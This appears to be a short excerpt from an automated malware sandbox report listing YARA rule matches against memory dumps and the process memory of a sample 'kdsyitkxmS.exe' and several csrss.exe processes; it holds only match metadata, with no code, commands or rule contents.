Source: Yara match File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR